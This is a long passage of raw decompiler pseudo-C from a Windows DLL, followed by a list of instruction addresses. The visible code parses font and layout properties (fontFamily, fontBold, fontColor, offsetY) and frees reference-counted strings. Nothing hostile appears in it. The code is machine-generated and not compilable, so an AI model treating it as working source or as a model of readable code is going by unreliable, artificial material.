																																																																					__eflags = _t1187;
																																																																					if(_t1187 != 0) {
																																																																						 *_t1823(_t1187);
																																																																						 *_t1869 = 0;
																																																																					}
																																																																					_t1188 =  *(_t1869 + 4);
																																																																					__eflags = _t1188;
																																																																					if(_t1188 != 0) {
																																																																						E6E4C4DBC(_t1188);
																																																																						_t1921 = _t1921 + 4;
																																																																						 *(_t1869 + 4) = 0;
																																																																					}
																																																																					_push(0xc);
																																																																					E6E4C4D5B(_t1869);
																																																																					_t1921 = _t1921 + 8;
																																																																				}
																																																																			}
																																																																			_v148 = 0;
																																																																		}
																																																																	}
																																																																} else {
																																																																	_push( &_v72);
																																																																	_t1198 = E6E4B9100(_t1574,  &_v140, _t1794, _t1823, _t1866, _t1975);
																																																																	_v20 = 0x13;
																																																																	_t1200 = E6E4D5A09(_t1198, E6E4B8F90(_t1198));
																																																																	_t1921 = _t1921 + 4;
																																																																	_t1870 = _v140;
																																																																	 *(_v96 + 0x4c) = _t1200;
																																																																	__eflags = _t1870;
																																																																	if(_t1870 != 0) {
																																																																		asm("lock xadd [esi+0x8], eax");
																																																																		__eflags = (_t1200 | 0xffffffff) == 1;
																																																																		if((_t1200 | 0xffffffff) == 1) {
																																																																			__eflags = _t1870;
																																																																			if(_t1870 != 0) {
																																																																				_t1203 =  *_t1870;
																																																																				__eflags = _t1203;
																																																																				if(_t1203 != 0) {
																																																																					 *_t1823(_t1203);
																																																																					 *_t1870 = 0;
																																																																				}
																																																																				_t1204 =  *(_t1870 + 4);
																																																																				__eflags = _t1204;
																																																																				if(_t1204 != 0) {
																																																																					E6E4C4DBC(_t1204);
																																																																					_t1921 = _t1921 + 4;
																																																																					 *(_t1870 + 4) = 0;
																																																																				}
																																																																				_push(0xc);
																																																																				E6E4C4D5B(_t1870);
																																																																				_t1921 = _t1921 + 8;
																																																																			}
																																																																		}
																																																																		_v140 = 0;
																																																																	}
																																																																}
																																																															} else {
																																																																_push( &_v72);
																																																																_t1214 = E6E4B9100(_t1573,  &_v132, _t1794, _t1823, _t1865, _t1975);
																																																																_v20 = 0x12;
																																																																E6E4D62B9(E6E4B8F90(_t1214));
																																																																_t1217 = _v96;
																																																																_t1921 = _t1921 + 4;
																																																																_t1871 = _v132;
																																																																 *((long long*)(_t1217 + 0x50)) = _t1975;
																																																																__eflags = _t1871;
																																																																if(_t1871 != 0) {
																																																																	asm("lock xadd [esi+0x8], eax");
																																																																	__eflags = (_t1217 | 0xffffffff) == 1;
																																																																	if((_t1217 | 0xffffffff) == 1) {
																																																																		__eflags = _t1871;
																																																																		if(_t1871 != 0) {
																																																																			_t1220 =  *_t1871;
																																																																			__eflags = _t1220;
																																																																			if(_t1220 != 0) {
																																																																				 *_t1823(_t1220);
																																																																				 *_t1871 = 0;
																																																																			}
																																																																			_t1221 =  *(_t1871 + 4);
																																																																			__eflags = _t1221;
																																																																			if(_t1221 != 0) {
																																																																				E6E4C4DBC(_t1221);
																																																																				_t1921 = _t1921 + 4;
																																																																				 *(_t1871 + 4) = 0;
																																																																			}
																																																																			_push(0xc);
																																																																			E6E4C4D5B(_t1871);
																																																																			_t1921 = _t1921 + 8;
																																																																		}
																																																																	}
																																																																	_v132 = 0;
																																																																}
																																																															}
																																																														} else {
																																																															_push( &_v72);
																																																															_t1231 = E6E4B9100(_t1572,  &_v124, _t1794, _t1823, _t1864, _t1975);
																																																															_v20 = 0x11;
																																																															_t1810 =  *_t1231;
																																																															__eflags = _t1810;
																																																															if(_t1810 == 0) {
																																																																_t1794 = 0;
																																																																__eflags = 0;
																																																															} else {
																																																																_t1794 =  *_t1810;
																																																															}
																																																															_t1689 = _t1794;
																																																															_t1872 = _t1689 + 2;
																																																															do {
																																																																_t1232 =  *_t1689;
																																																																_t1689 = _t1689 + 2;
																																																																__eflags = _t1232;
																																																															} while (_t1232 != 0);
																																																															_push(_t1689 - _t1872 >> 1);
																																																															_t1233 = E6E4BC650(_t1572, _v96, _t1823, _t1872, _t1975, _t1794);
																																																															_t1873 = _v124;
																																																															__eflags = _t1873;
																																																															if(_t1873 != 0) {
																																																																asm("lock xadd [esi+0x8], eax");
																																																																__eflags = (_t1233 | 0xffffffff) == 1;
																																																																if((_t1233 | 0xffffffff) == 1) {
																																																																	__eflags = _t1873;
																																																																	if(_t1873 != 0) {
																																																																		_t1236 =  *_t1873;
																																																																		__eflags = _t1236;
																																																																		if(_t1236 != 0) {
																																																																			 *_t1823(_t1236);
																																																																			 *_t1873 = 0;
																																																																		}
																																																																		_t1237 =  *(_t1873 + 4);
																																																																		__eflags = _t1237;
																																																																		if(_t1237 != 0) {
																																																																			E6E4C4DBC(_t1237);
																																																																			_t1921 = _t1921 + 4;
																																																																			 *(_t1873 + 4) = 0;
																																																																		}
																																																																		_push(0xc);
																																																																		E6E4C4D5B(_t1873);
																																																																		_t1921 = _t1921 + 8;
																																																																	}
																																																																}
																																																																_v124 = 0;
																																																															}
																																																														}
																																																													} else {
																																																														_push( &_v72);
																																																														_t1247 = E6E4B9100(_t1571,  &_v116, _t1794, _t1823, _t1863, _t1975);
																																																														_v20 = 0x10;
																																																														_t1811 =  *_t1247;
																																																														__eflags = _t1811;
																																																														if(_t1811 == 0) {
																																																															_t1794 = 0;
																																																															__eflags = 0;
																																																														} else {
																																																															_t1794 =  *_t1811;
																																																														}
																																																														_t1696 = _t1794;
																																																														_t1874 = _t1696 + 2;
																																																														do {
																																																															_t1248 =  *_t1696;
																																																															_t1696 = _t1696 + 2;
																																																															__eflags = _t1248;
																																																														} while (_t1248 != 0);
																																																														_push(_t1696 - _t1874 >> 1);
																																																														_t1249 = E6E4BC650(_t1571, _v96 + 0x30, _t1823, _t1874, _t1975, _t1794);
																																																														_t1875 = _v116;
																																																														__eflags = _t1875;
																																																														if(_t1875 != 0) {
																																																															asm("lock xadd [esi+0x8], eax");
																																																															__eflags = (_t1249 | 0xffffffff) == 1;
																																																															if((_t1249 | 0xffffffff) == 1) {
																																																																__eflags = _t1875;
																																																																if(_t1875 != 0) {
																																																																	_t1252 =  *_t1875;
																																																																	__eflags = _t1252;
																																																																	if(_t1252 != 0) {
																																																																		 *_t1823(_t1252);
																																																																		 *_t1875 = 0;
																																																																	}
																																																																	_t1253 =  *(_t1875 + 4);
																																																																	__eflags = _t1253;
																																																																	if(_t1253 != 0) {
																																																																		E6E4C4DBC(_t1253);
																																																																		_t1921 = _t1921 + 4;
																																																																		 *(_t1875 + 4) = 0;
																																																																	}
																																																																	_push(0xc);
																																																																	E6E4C4D5B(_t1875);
																																																																	_t1921 = _t1921 + 8;
																																																																}
																																																															}
																																																															_v116 = 0;
																																																														}
																																																													}
																																																												} else {
																																																													_push( &_v72);
																																																													_t1263 = E6E4B9100(_t1570,  &_v108, _t1794, _t1823, _t1862, _t1975);
																																																													_v20 = 0xf;
																																																													_t1812 =  *_t1263;
																																																													__eflags = _t1812;
																																																													if(_t1812 == 0) {
																																																														_t1794 = 0;
																																																														__eflags = 0;
																																																													} else {
																																																														_t1794 =  *_t1812;
																																																													}
																																																													_t1704 = _t1794;
																																																													_t1876 = _t1704 + 2;
																																																													do {
																																																														_t1264 =  *_t1704;
																																																														_t1704 = _t1704 + 2;
																																																														__eflags = _t1264;
																																																													} while (_t1264 != 0);
																																																													_push(_t1704 - _t1876 >> 1);
																																																													_t1265 = E6E4BC650(_t1570, _v96 + 0x18, _t1823, _t1876, _t1975, _t1794);
																																																													_t1877 = _v108;
																																																													__eflags = _t1877;
																																																													if(_t1877 != 0) {
																																																														asm("lock xadd [esi+0x8], eax");
																																																														__eflags = (_t1265 | 0xffffffff) == 1;
																																																														if((_t1265 | 0xffffffff) == 1) {
																																																															__eflags = _t1877;
																																																															if(_t1877 != 0) {
																																																																_t1268 =  *_t1877;
																																																																__eflags = _t1268;
																																																																if(_t1268 != 0) {
																																																																	 *_t1823(_t1268);
																																																																	 *_t1877 = 0;
																																																																}
																																																																_t1269 =  *(_t1877 + 4);
																																																																__eflags = _t1269;
																																																																if(_t1269 != 0) {
																																																																	E6E4C4DBC(_t1269);
																																																																	_t1921 = _t1921 + 4;
																																																																	 *(_t1877 + 4) = 0;
																																																																}
																																																																_push(0xc);
																																																																E6E4C4D5B(_t1877);
																																																																_t1921 = _t1921 + 8;
																																																															}
																																																														}
																																																														_v108 = 0;
																																																													}
																																																												}
																																																												_t1172 =  &_v72;
																																																												__imp__#9(_t1172);
																																																												_t1868 = _v36;
																																																												__eflags = _t1868;
																																																												if(_t1868 != 0) {
																																																													asm("lock xadd [esi+0x8], eax");
																																																													__eflags = (_t1172 | 0xffffffff) == 1;
																																																													if((_t1172 | 0xffffffff) == 1) {
																																																														_t1176 =  *_t1868;
																																																														__eflags = _t1176;
																																																														if(_t1176 != 0) {
																																																															 *_t1823(_t1176);
																																																															 *_t1868 = 0;
																																																														}
																																																														_t1177 =  *(_t1868 + 4);
																																																														__eflags = _t1177;
																																																														if(_t1177 != 0) {
																																																															E6E4C4DBC(_t1177);
																																																															_t1921 = _t1921 + 4;
																																																															 *(_t1868 + 4) = 0;
																																																														}
																																																														_push(0xc);
																																																														E6E4C4D5B(_t1868);
																																																														_t1921 = _t1921 + 8;
																																																													}
																																																												}
																																																												_v20 = 4;
																																																												_t1559 = __imp__#6;
																																																												 *_t1559(_v48);
																																																												_t1148 = _v40;
																																																												_t1593 = _v100 + 1;
																																																												_v100 = _t1593;
																																																												__eflags = _t1593 - _v52;
																																																												if(_t1593 < _v52) {
																																																													continue;
																																																												} else {
																																																													goto L496;
																																																												}
																																																											}
																																																										}
																																																									}
																																																								}
																																																							}
																																																						}
																																																						goto L685;
																																																					}
																																																					goto L505;
																																																				}
																																																			}
																																																		}
																																																	}
																																																}
																																															} else {
																																																_t1283 = _t1794;
																																																goto L330;
																																															}
																																														}
																																													}
																																												} else {
																																													_v16 = 0xe;
																																													_t1348 = E6E4B8CC0(_t1559,  &_v192,  &_v172, __eflags, "fontFamily");
																																													_t1727 =  &_v32;
																																													_t1349 = E6E4B8FB0(_t1727, _t1348);
																																													_t1879 = _v192;
																																													_v173 = _t1349;
																																													__eflags = _t1879;
																																													if(_t1879 != 0) {
																																														asm("lock xadd [esi+0x8], ecx");
																																														__eflags = (_t1727 | 0xffffffff) == 1;
																																														if((_t1727 | 0xffffffff) == 1) {
																																															__eflags = _t1879;
																																															if(_t1879 != 0) {
																																																_t1448 =  *_t1879;
																																																__eflags = _t1448;
																																																if(_t1448 != 0) {
																																																	 *_t1559(_t1448);
																																																	 *_t1879 = 0;
																																																}
																																																_t1449 =  *(_t1879 + 4);
																																																__eflags = _t1449;
																																																if(_t1449 != 0) {
																																																	E6E4C4DBC(_t1449);
																																																	_t1919 = _t1919 + 4;
																																																	 *(_t1879 + 4) = 0;
																																																}
																																																_push(0xc);
																																																E6E4C4D5B(_t1879);
																																																_t1349 = _v173;
																																																_t1919 = _t1919 + 8;
																																															}
																																														}
																																														_v192 = 0;
																																													}
																																													__eflags = _t1349;
																																													if(__eflags == 0) {
																																														_t1350 = E6E4B8CC0(_t1559,  &_v200, _t1793, __eflags, "fontBold");
																																														_t1729 =  &_v32;
																																														_t1351 = E6E4B8FB0(_t1729, _t1350);
																																														_t1880 = _v200;
																																														_v173 = _t1351;
																																														__eflags = _t1880;
																																														if(_t1880 != 0) {
																																															asm("lock xadd [esi+0x8], ecx");
																																															__eflags = (_t1729 | 0xffffffff) == 1;
																																															if((_t1729 | 0xffffffff) == 1) {
																																																__eflags = _t1880;
																																																if(_t1880 != 0) {
																																																	_t1432 =  *_t1880;
																																																	__eflags = _t1432;
																																																	if(_t1432 != 0) {
																																																		 *_t1559(_t1432);
																																																		 *_t1880 = 0;
																																																	}
																																																	_t1433 =  *(_t1880 + 4);
																																																	__eflags = _t1433;
																																																	if(_t1433 != 0) {
																																																		E6E4C4DBC(_t1433);
																																																		_t1919 = _t1919 + 4;
																																																		 *(_t1880 + 4) = 0;
																																																	}
																																																	_push(0xc);
																																																	E6E4C4D5B(_t1880);
																																																	_t1351 = _v173;
																																																	_t1919 = _t1919 + 8;
																																																}
																																															}
																																															_v200 = 0;
																																														}
																																														__eflags = _t1351;
																																														if(__eflags == 0) {
																																															_t1352 = E6E4B8CC0(_t1559,  &_v208, _t1793, __eflags, "fontItalic");
																																															_t1731 =  &_v32;
																																															_t1353 = E6E4B8FB0(_t1731, _t1352);
																																															_t1881 = _v208;
																																															_v173 = _t1353;
																																															__eflags = _t1881;
																																															if(_t1881 != 0) {
																																																asm("lock xadd [esi+0x8], ecx");
																																																__eflags = (_t1731 | 0xffffffff) == 1;
																																																if((_t1731 | 0xffffffff) == 1) {
																																																	__eflags = _t1881;
																																																	if(_t1881 != 0) {
																																																		_t1414 =  *_t1881;
																																																		__eflags = _t1414;
																																																		if(_t1414 != 0) {
																																																			 *_t1559(_t1414);
																																																			 *_t1881 = 0;
																																																		}
																																																		_t1415 =  *(_t1881 + 4);
																																																		__eflags = _t1415;
																																																		if(_t1415 != 0) {
																																																			E6E4C4DBC(_t1415);
																																																			_t1919 = _t1919 + 4;
																																																			 *(_t1881 + 4) = 0;
																																																		}
																																																		_push(0xc);
																																																		E6E4C4D5B(_t1881);
																																																		_t1353 = _v173;
																																																		_t1919 = _t1919 + 8;
																																																	}
																																																}
																																																_v208 = 0;
																																															}
																																															__eflags = _t1353;
																																															if(__eflags == 0) {
																																																_t1354 = E6E4B8CC0(_t1559,  &_v216, _t1793, __eflags, "fontColor");
																																																_t1733 =  &_v32;
																																																_t1355 = E6E4B8FB0(_t1733, _t1354);
																																																_t1882 = _v216;
																																																_v173 = _t1355;
																																																__eflags = _t1882;
																																																if(_t1882 != 0) {
																																																	asm("lock xadd [esi+0x8], ecx");
																																																	__eflags = (_t1733 | 0xffffffff) == 1;
																																																	if((_t1733 | 0xffffffff) == 1) {
																																																		__eflags = _t1882;
																																																		if(_t1882 != 0) {
																																																			_t1396 =  *_t1882;
																																																			__eflags = _t1396;
																																																			if(_t1396 != 0) {
																																																				 *_t1559(_t1396);
																																																				 *_t1882 = 0;
																																																			}
																																																			_t1397 =  *(_t1882 + 4);
																																																			__eflags = _t1397;
																																																			if(_t1397 != 0) {
																																																				E6E4C4DBC(_t1397);
																																																				_t1919 = _t1919 + 4;
																																																				 *(_t1882 + 4) = 0;
																																																			}
																																																			_push(0xc);
																																																			E6E4C4D5B(_t1882);
																																																			_t1355 = _v173;
																																																			_t1919 = _t1919 + 8;
																																																		}
																																																	}
																																																	_v216 = 0;
																																																}
																																																__eflags = _t1355;
																																																if(__eflags == 0) {
																																																	_t1356 = E6E4B8CC0(_t1559,  &_v224, _t1793, __eflags, "fontSize");
																																																	_t1735 =  &_v32;
																																																	_t1357 = E6E4B8FB0(_t1735, _t1356);
																																																	_t1883 = _v224;
																																																	_v173 = _t1357;
																																																	__eflags = _t1883;
																																																	if(_t1883 != 0) {
																																																		asm("lock xadd [esi+0x8], ecx");
																																																		__eflags = (_t1735 | 0xffffffff) == 1;
																																																		if((_t1735 | 0xffffffff) == 1) {
																																																			__eflags = _t1883;
																																																			if(_t1883 != 0) {
																																																				_t1379 =  *_t1883;
																																																				__eflags = _t1379;
																																																				if(_t1379 != 0) {
																																																					 *_t1559(_t1379);
																																																					 *_t1883 = 0;
																																																				}
																																																				_t1380 =  *(_t1883 + 4);
																																																				__eflags = _t1380;
																																																				if(_t1380 != 0) {
																																																					E6E4C4DBC(_t1380);
																																																					_t1919 = _t1919 + 4;
																																																					 *(_t1883 + 4) = 0;
																																																				}
																																																				_push(0xc);
																																																				E6E4C4D5B(_t1883);
																																																				_t1357 = _v173;
																																																				_t1919 = _t1919 + 8;
																																																			}
																																																		}
																																																		_v224 = 0;
																																																	}
																																																	__eflags = _t1357;
																																																	if(_t1357 != 0) {
																																																		_push( &_v68);
																																																		_t1368 = E6E4B9100(_t1559,  &_v228, _t1793, _t1823, _t1883, _t1975);
																																																		_v16 = 0x10;
																																																		E6E4D62B9(E6E4B8F90(_t1368));
																																																		_t1371 = _v184;
																																																		_t1919 = _t1919 + 4;
																																																		_t1884 = _v228;
																																																		 *((long long*)(_t1371 + 0x20)) = _t1975;
																																																		__eflags = _t1884;
																																																		if(_t1884 != 0) {
																																																			asm("lock xadd [esi+0x8], eax");
																																																			__eflags = (_t1371 | 0xffffffff) == 1;
																																																			if((_t1371 | 0xffffffff) == 1) {
																																																				__eflags = _t1884;
																																																				if(_t1884 != 0) {
																																																					_t1374 =  *_t1884;
																																																					__eflags = _t1374;
																																																					if(_t1374 != 0) {
																																																						 *_t1559(_t1374);
																																																						 *_t1884 = 0;
																																																					}
																																																					_t1375 =  *(_t1884 + 4);
																																																					__eflags = _t1375;
																																																					if(_t1375 != 0) {
																																																						E6E4C4DBC(_t1375);
																																																						_t1919 = _t1919 + 4;
																																																						 *(_t1884 + 4) = 0;
																																																					}
																																																					_push(0xc);
																																																					E6E4C4D5B(_t1884);
																																																					_t1919 = _t1919 + 8;
																																																				}
																																																			}
																																																			_v228 = 0;
																																																		}
																																																	}
																																																} else {
																																																	_push( &_v68);
																																																	_t1742 =  *(E6E4B9100(_t1559,  &_v220, _t1793, _t1823, _t1882, _t1975));
																																																	__eflags = _t1742;
																																																	if(_t1742 == 0) {
																																																		_t1743 = 0;
																																																		__eflags = 0;
																																																	} else {
																																																		_t1743 =  *_t1742;
																																																	}
																																																	_t1388 = E6E4B8B50(_t1743, L"%lX", _v184 + 0x1c);
																																																	_t1885 = _v220;
																																																	_t1919 = _t1919 + 0xc;
																																																	__eflags = _t1885;
																																																	if(_t1885 != 0) {
																																																		asm("lock xadd [esi+0x8], eax");
																																																		__eflags = (_t1388 | 0xffffffff) == 1;
																																																		if((_t1388 | 0xffffffff) == 1) {
																																																			__eflags = _t1885;
																																																			if(_t1885 != 0) {
																																																				_t1391 =  *_t1885;
																																																				__eflags = _t1391;
																																																				if(_t1391 != 0) {
																																																					 *_t1559(_t1391);
																																																					 *_t1885 = 0;
																																																				}
																																																				_t1392 =  *(_t1885 + 4);
																																																				__eflags = _t1392;
																																																				if(_t1392 != 0) {
																																																					E6E4C4DBC(_t1392);
																																																					_t1919 = _t1919 + 4;
																																																					 *(_t1885 + 4) = 0;
																																																				}
																																																				_push(0xc);
																																																				E6E4C4D5B(_t1885);
																																																				_t1919 = _t1919 + 8;
																																																			}
																																																		}
																																																		_v220 = 0;
																																																	}
																																																}
																																															} else {
																																																_push( &_v68);
																																																_t1403 =  *(E6E4B9100(_t1559,  &_v212, _t1793, _t1823, _t1881, _t1975));
																																																__eflags = _t1403;
																																																if(_t1403 == 0) {
																																																	_t1404 = 0;
																																																	__eflags = 0;
																																																} else {
																																																	_t1404 =  *_t1403;
																																																}
																																																_t1405 = E6E4D5A33(_t1559, _t1823, _t1881, _t1404, L"true");
																																																_t1919 = _t1919 + 8;
																																																_t1886 = _v212;
																																																__eflags = _t1405;
																																																 *((char*)(_v184 + 0x19)) = _t1405 & 0xffffff00 | _t1405 == 0x00000000;
																																																__eflags = _t1886;
																																																if(_t1886 != 0) {
																																																	asm("lock xadd [esi+0x8], eax");
																																																	__eflags = 0xfffffffffffffffe;
																																																	if(0xfffffffffffffffe == 0) {
																																																		__eflags = _t1886;
																																																		if(_t1886 != 0) {
																																																			_t1409 =  *_t1886;
																																																			__eflags = _t1409;
																																																			if(_t1409 != 0) {
																																																				 *_t1559(_t1409);
																																																				 *_t1886 = 0;
																																																			}
																																																			_t1410 =  *(_t1886 + 4);
																																																			__eflags = _t1410;
																																																			if(_t1410 != 0) {
																																																				E6E4C4DBC(_t1410);
																																																				_t1919 = _t1919 + 4;
																																																				 *(_t1886 + 4) = 0;
																																																			}
																																																			_push(0xc);
																																																			E6E4C4D5B(_t1886);
																																																			_t1919 = _t1919 + 8;
																																																		}
																																																	}
																																																	_v212 = 0;
																																																}
																																															}
																																														} else {
																																															_push( &_v68);
																																															_t1421 =  *(E6E4B9100(_t1559,  &_v204, _t1793, _t1823, _t1880, _t1975));
																																															__eflags = _t1421;
																																															if(_t1421 == 0) {
																																																_t1422 = 0;
																																																__eflags = 0;
																																															} else {
																																																_t1422 =  *_t1421;
																																															}
																																															_t1423 = E6E4D5A33(_t1559, _t1823, _t1880, _t1422, L"true");
																																															_t1919 = _t1919 + 8;
																																															_t1887 = _v204;
																																															__eflags = _t1423;
																																															 *((char*)(_v184 + 0x18)) = _t1423 & 0xffffff00 | _t1423 == 0x00000000;
																																															__eflags = _t1887;
																																															if(_t1887 != 0) {
																																																asm("lock xadd [esi+0x8], eax");
																																																__eflags = 0xfffffffffffffffe;
																																																if(0xfffffffffffffffe == 0) {
																																																	__eflags = _t1887;
																																																	if(_t1887 != 0) {
																																																		_t1427 =  *_t1887;
																																																		__eflags = _t1427;
																																																		if(_t1427 != 0) {
																																																			 *_t1559(_t1427);
																																																			 *_t1887 = 0;
																																																		}
																																																		_t1428 =  *(_t1887 + 4);
																																																		__eflags = _t1428;
																																																		if(_t1428 != 0) {
																																																			E6E4C4DBC(_t1428);
																																																			_t1919 = _t1919 + 4;
																																																			 *(_t1887 + 4) = 0;
																																																		}
																																																		_push(0xc);
																																																		E6E4C4D5B(_t1887);
																																																		_t1919 = _t1919 + 8;
																																																	}
																																																}
																																																_v204 = 0;
																																															}
																																														}
																																													} else {
																																														_push( &_v68);
																																														_t1438 = E6E4B9100(_t1559,  &_v196, _t1793, _t1823, _t1879, _t1975);
																																														_v16 = 0xf;
																																														_t1819 =  *_t1438;
																																														__eflags = _t1819;
																																														if(_t1819 == 0) {
																																															_t1793 = 0;
																																															__eflags = 0;
																																														} else {
																																															_t1793 =  *_t1819;
																																														}
																																														_t1755 = _t1793;
																																														_t269 = _t1755 + 2; // 0x2
																																														_t1888 = _t269;
																																														do {
																																															_t1439 =  *_t1755;
																																															_t1755 = _t1755 + 2;
																																															__eflags = _t1439;
																																														} while (_t1439 != 0);
																																														_push(_t1755 - _t1888 >> 1);
																																														_t1440 = E6E4BC650(_t1559, _v184, _t1823, _t1888, _t1975, _t1793);
																																														_t1889 = _v196;
																																														__eflags = _t1889;
																																														if(_t1889 != 0) {
																																															asm("lock xadd [esi+0x8], eax");
																																															__eflags = (_t1440 | 0xffffffff) == 1;
																																															if((_t1440 | 0xffffffff) == 1) {
																																																__eflags = _t1889;
																																																if(_t1889 != 0) {
																																																	_t1443 =  *_t1889;
																																																	__eflags = _t1443;
																																																	if(_t1443 != 0) {
																																																		 *_t1559(_t1443);
																																																		 *_t1889 = 0;
																																																	}
																																																	_t1444 =  *(_t1889 + 4);
																																																	__eflags = _t1444;
																																																	if(_t1444 != 0) {
																																																		E6E4C4DBC(_t1444);
																																																		_t1919 = _t1919 + 4;
																																																		 *(_t1889 + 4) = 0;
																																																	}
																																																	_push(0xc);
																																																	E6E4C4D5B(_t1889);
																																																	_t1919 = _t1919 + 8;
																																																}
																																															}
																																															_v196 = 0;
																																														}
																																													}
																																													_t1358 =  &_v68;
																																													__imp__#9(_t1358);
																																													_t1839 = _v32;
																																													__eflags = _t1839;
																																													if(_t1839 != 0) {
																																														asm("lock xadd [esi+0x8], eax");
																																														__eflags = (_t1358 | 0xffffffff) == 1;
																																														if((_t1358 | 0xffffffff) == 1) {
																																															_t1362 =  *_t1839;
																																															__eflags = _t1362;
																																															if(_t1362 != 0) {
																																																 *_t1559(_t1362);
																																																 *_t1839 = 0;
																																															}
																																															_t1363 =  *(_t1839 + 4);
																																															__eflags = _t1363;
																																															if(_t1363 != 0) {
																																																E6E4C4DBC(_t1363);
																																																_t1919 = _t1919 + 4;
																																																 *(_t1839 + 4) = 0;
																																															}
																																															_push(0xc);
																																															E6E4C4D5B(_t1839);
																																															_t1919 = _t1919 + 8;
																																														}
																																													}
																																													_v16 = 4;
																																													 *_t1559(_v40);
																																													_t1588 = _v188 + 1;
																																													_v188 = _t1588;
																																													__eflags = _t1588 - _v52;
																																													if(_t1588 >= _v52) {
																																														goto L273;
																																													} else {
																																														_t1294 = _v44;
																																														continue;
																																													}
																																												}
																																											}
																																										}
																																									}
																																								}
																																							}
																																							goto L685;
																																						}
																																						goto L319;
																																					}
																																				}
																																			}
																																		}
																																	}
																																} else {
																																	_t927 = _t1793;
																																	goto L135;
																																}
																															}
																														}
																													} else {
																														_t921 = _t1792;
																														goto L128;
																													}
																												}
																											}
																										} else {
																											goto L102;
																										}
																									}
																								}
																							}
																						}
																					}
																				}
																			}
																			goto L685;
																		}
																		goto L121;
																	}
																}
															} else {
																_v8 = 0xe;
																_t1530 = E6E4B8CC0(_t1558,  &_v88, _t1791, _t1956, "offsetY");
																_t1785 =  &_v32;
																_t1531 = E6E4B8FB0(_t1785, _t1530);
																_t1892 = _v88;
																_v77 = _t1531;
																if(_t1892 != 0) {
																	asm("lock xadd [esi+0x8], ecx");
																	if((_t1785 | 0xffffffff) == 1 && _t1892 != 0) {
																		_t1552 =  *_t1892;
																		if(_t1552 != 0) {
																			 *_t1558(_t1552);
																			 *_t1892 = 0;
																		}
																		_t1553 = _t1892[1];
																		if(_t1892[1] != 0) {
																			E6E4C4DBC(_t1553);
																			_t1915 = _t1915 + 4;
																			_t1892[1] = 0;
																		}
																		_push(0xc);
																		E6E4C4D5B(_t1892);
																		_t1531 = _v77;
																		_t1915 = _t1915 + 8;
																	}
																	_v88 = 0;
																}
																if(_t1531 != 0) {
																	_push( &_v60);
																	_t1787 =  &_v92;
																	_t1542 = E6E4B9100(_t1558,  &_v92, _t1791, _t1823, _t1892, _t1975);
																	_v8 = 0xf;
																	_t1893 =  *_t1542;
																	if(_t1893 == 0) {
																		_t1543 = 0;
																		__eflags = 0;
																	} else {
																		_t1543 =  *((intOrPtr*)(_t1893 + 4));
																		if( *((intOrPtr*)(_t1893 + 4)) == 0) {
																			 *((intOrPtr*)(_t1893 + 4)) = E6E4C8680(_t1558,  *_t1893);
																		}
																	}
																	_t1544 = E6E4D5A09(_t1787, _t1543);
																	_t1915 = _t1915 + 4;
																	_t1894 = _v92;
																	 *_v96 = _t1544;
																	if(_t1894 != 0) {
																		asm("lock xadd [esi+0x8], eax");
																		if((_t1544 | 0xffffffff) == 1 && _t1894 != 0) {
																			_t1547 =  *_t1894;
																			if(_t1547 != 0) {
																				 *_t1558(_t1547);
																				 *_t1894 = 0;
																			}
																			_t1548 = _t1894[1];
																			if(_t1894[1] != 0) {
																				E6E4C4DBC(_t1548);
																				_t1915 = _t1915 + 4;
																				_t1894[1] = 0;
																			}
																			_push(0xc);
																			E6E4C4D5B(_t1894);
																			_t1915 = _t1915 + 8;
																		}
																		_v92 = 0;
																	}
																}
																_t1532 =  &_v60;
																__imp__#9(_t1532);
																_t1834 = _v32;
																if(_t1834 != 0) {
																	asm("lock xadd [esi+0x8], eax");
																	if((_t1532 | 0xffffffff) == 1) {
																		_t1536 =  *_t1834;
																		if(_t1536 != 0) {
																			 *_t1558(_t1536);
																			 *_t1834 = 0;
																		}
																		_t1537 =  *(_t1834 + 4);
																		if( *(_t1834 + 4) != 0) {
																			E6E4C4DBC(_t1537);
																			_t1915 = _t1915 + 4;
																			 *(_t1834 + 4) = 0;
																		}
																		_push(0xc);
																		E6E4C4D5B(_t1834);
																		_t1915 = _t1915 + 8;
																	}
																}
																_v8 = 4;
																 *_t1558(_v24);
																_t1582 = _v84 + 1;
																_v84 = _t1582;
																if(_t1582 >= _v44) {
																	goto L48;
																} else {
																	_t1498 = _v36;
																	continue;
																}
															}
														}
													}
												}
											}
										}
										goto L685;
									}
									goto L80;
								}
							}
						}
					}
				}
				L685:
			}

0x6e4b9ba0
0x6e4b9ba0
0x6e4b9ba0
0x6e4b9ba0
0x6e4b9ba0
0x6e4b9ba1
0x6e4b9ba3
0x6e4b9ba5
0x6e4b9bb0
0x6e4b9bb1
0x6e4b9bb4
0x6e4b9bb9
0x6e4b9bbb
0x6e4b9bbe
0x6e4b9bc0
0x6e4b9bc1
0x6e4b9bc5
0x6e4b9bcb
0x6e4b9bd0
0x6e4b9bd3
0x6e4b9bda
0x6e4b9be1
0x6e4b9be5
0x6e4ba03c
0x6e4ba041
0x00000000
0x6e4b9beb
0x6e4b9bed
0x6e4b9bf0
0x6e4b9bf4
0x6e4b9bf5
0x6e4b9bf6
0x6e4b9c02
0x6e4ba008
0x6e4ba008
0x00000000
0x6e4b9c08
0x6e4b9c08
0x6e4b9c0d
0x6e4ba046
0x6e4ba04b
0x00000000
0x6e4b9c13
0x6e4b9c13
0x6e4b9c15
0x6e4b9c18
0x6e4b9c19
0x6e4b9c1f
0x00000000
0x6e4b9c25
0x6e4b9c25
0x6e4b9c27
0x6e4b9c2a
0x6e4b9c2e
0x6e4b9c34
0x6e4b9c3a
0x6e4b9e69
0x6e4b9e69
0x6e4b9e73
0x6e4b9e77
0x6e4b9e79
0x6e4b9e7b
0x00000000
0x6e4b9e81
0x6e4b9e83
0x6e4b9e86
0x6e4b9e8c
0x6e4b9e93
0x6e4b9e96
0x6e4b9e99
0x6e4b9e9b
0x6e4b9fc8
0x00000000
0x6e4b9ea1
0x6e4b9ea1
0x6e4b9ea7
0x6e4b9eb0
0x6e4b9eb0
0x6e4b9eb7
0x6e4b9ebb
0x6e4b9ebd
0x00000000
0x00000000
0x6e4b9ec5
0x6e4b9eca
0x6e4b9ecd
0x6e4b9ecf
0x6e4b9ffc
0x6e4b9fff
0x6e4ba001
0x6e4b9fca
0x6e4b9fca
0x6e4b9fce
0x6e4b9fd0
0x6e4b9fd5
0x6e4b9fd5
0x00000000
0x6e4b9ed5
0x6e4b9ee4
0x6e4b9ee6
0x6e4b9ee8
0x6e4b9ee8
0x6e4b9eee
0x6e4b9ef4
0x6e4b9ef6
0x6e4b9ef8
0x00000000
0x6e4b9efe
0x6e4b9f0b
0x6e4b9f0d
0x6e4b9f0f
0x00000000
0x6e4b9f15
0x6e4b9f15
